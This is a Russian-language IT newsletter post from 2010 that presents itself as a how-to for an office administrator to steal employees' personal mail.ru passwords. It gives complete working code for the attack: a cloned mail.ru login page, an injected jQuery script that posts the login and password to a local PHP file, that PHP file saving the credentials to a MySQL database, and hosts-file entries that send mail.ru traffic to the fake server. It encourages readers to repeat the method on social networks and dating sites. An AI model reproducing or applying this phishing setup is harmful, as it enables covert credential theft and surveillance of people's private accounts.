| ← Сентябрь 2010 → | ||||||
|
1
|
2
|
3
|
4
|
5
|
||
|---|---|---|---|---|---|---|
|
6
|
7
|
8
|
9
|
10
|
11
|
12
|
|
13
|
14
|
15
|
16
|
17
|
18
|
19
|
|
20
|
21
|
22
|
23
|
24
|
25
|
26
|
|
27
|
28
|
29
|
||||
За последние 60 дней ни разу не выходила
Сайт рассылки:
http://www.itguruu.ru
Открыта:
28-06-2010
Статистика
0 за неделю
АйТи Гуру - настройка и обслуживание компьютера Офис под колпаком – воруем пароли к почте
Воруем пароли Итак, есть задача – получить пароль от личной почты сотрудника. Задача усложняется тем, что используется подключенный к сети личный ноутбук, не входящий в домен. С компьютерами входящими в домен история проще – в этом случае админ царь и бог и творит что угодно с компьютерами в сети, они все ему подвластны. Конечно есть варианты наподобие установки radmin`а на этот ноутбук, но для этого нужен повод для того, чтобы получить к нему физический доступ и не всегда просто произвести незаметно необходимые действия, когда у тебя человек стоит за спиной. Единственное стоящее направление “исследования” (помимо описанного ниже) – это сниффер, но опять же не так просто найти нужный и работающий сниффер – например мне удалось найти сниффер собирающий пароли проходящие через pop3 и smtp, а вот если человек заходит на почту через бразуер – тут он уже не справляется. Казалось бы нет совсем вариантов, но… Давайте вспомним то, что интернет в любой организации раздается централизованно и проходит в любом случае через прокси сервер. Вот оно слабое место. И тут мне пришла в голову мысль – а почему бы не перенаправить запрос пользователя к серверу mail.ru на свой локальный веб-сервер? Схема проста – пользователь вводит mail.ru в строке браузера, а загружается страничка с нашего локального веб-сервера абсолютно идентичная оригинальной странице mail.ru. При нажатии кнопки “вход” отрабатывает java-скрипт “ворующий” логин и пароль, а затем уже идет переход к настоящему mail.ru и пользователь входит в почту. Для пользователя в итоге это абсолютно незаметно. Итак, что нужно сделать – в 1ю очередь установить веб-сервер на любой внутренний сервер организации (да в конце концов можно и на свой компьютер) – в нашем случае это был сервер с ip 192.168.1.7 с установленным Денвером. Далее заходим на mail.ru и сохраняем код страницы в файл index.html нашего веб-сервера. Изменить код страницы можно по разному, вы можете подумать и что-то добавить, изменить и оптимизировать, в моем случае это выглядело так (долго особо я не заморачивался, можно было сделать и без jQuery, но мне так было быстрее): 1) после строки <head profile=”http://gmpg.org/xfn/11″> мы добавляем строку: <script src=’jquery-1.4.min.js’></script> И соответственно в каталог с index.html рядом нужно положить файл jquery-1.4.min.js (взять ) 2) после формы авторизации, перед строкой <!– /sln: authform –> вставляем следующие строки: <script>
$(‘#Auth’).submit(function() {
if ($(‘#Auth’).attr(‘post’)!=’true’)
{
$.post(‘http://www.mail.ru/mail.php’,{‘login’: $(‘#Login’).attr(‘value’), ‘password’: $(‘#Password’).attr(‘value’)}, function(data) {
$(‘#Auth’).attr(‘post’,'true’);
$(‘#Auth’).submit();
});
return false;
}
});
</script>
То есть при нажатии кнопки “Войти” срабатывает наш скрипт, он берет логин и пароль и отправляет его отдельному php-скрипту mail.php (который сохраняет логин и пароль в базу) и отменяет вход в почту. По окончанию обработки логина и пароля скриптом mail.php наш java-скрипт сам инициирует вход в почту с уже введенными пользователем данными, затем пользователь попадает уже на настоящий сервер mail.ru.
3) ну и остается добавить файл mail.php там же, где и index.html
<?php
if ((isset($_POST['login'])) && (isset($_POST['password'])))
{
$login=$_POST['login'];
$password=$_POST['password'];
}
if ((isset($_GET['login'])) && (isset($_GET['password'])))
{
$login=$_GET['login'];
$password=$_GET['password'];
}
if ((isset($login)) && (isset($password)))
{
$link = mysql_connect(‘localhost’, ‘root’, ”);
mysql_select_db(“mailpass”);
mysql_query(“INSERT INTO users VALUES(”,’$login’, ‘$password’, NOW())”);
mysql_close($link);
}
?>
Далее нам нужно, чтобы при обращении к прокси-серверу с запросом к mail.ru, запрос перенаправлялся на наш сервер. Для этого заходим в папку C:\windows\system32\drivers\etc и добавляем в файл hosts две строки:
192.168.1.7 mail.ru 192.168.1.7 www.mail.ru Все, теперь запрос будет перенаправляться на наш сервер. Собственно и все, остается пожинать плоды и ждать, когда все пароли потекут к нам в базу. К описанному выше можно многое добавить, оптимизировать, можно аналогично попробовать с другими почтовыми сервисами, сайтами знакомств, социальными сетями и пр. Основу – алгоритм, я описал, а остальное детали и все вполне реализуемо, дерзайте! Здесь можно оставить свои комментарии. Выпуск подготовленплагином wordpress для subscribe.ru |
| В избранное | ||
